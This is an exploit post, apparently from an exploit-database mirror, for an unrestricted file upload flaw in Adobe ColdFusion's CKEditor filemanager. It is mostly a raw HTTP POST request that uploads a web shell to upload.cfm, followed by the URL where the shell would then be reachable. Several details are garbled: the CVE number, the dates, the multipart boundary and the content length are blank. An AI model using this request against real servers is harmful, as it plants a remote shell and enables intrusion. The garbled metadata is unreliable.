[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload

时间:2023-02-06 23:35:07
# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion
have been elevated to Priority due to a report that CVE--
is now being actively exploited. ```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests: -----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg %shell code here%
-----------------------------
Content-Disposition: form-data; name="path" shell
-------------------------------
``` a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file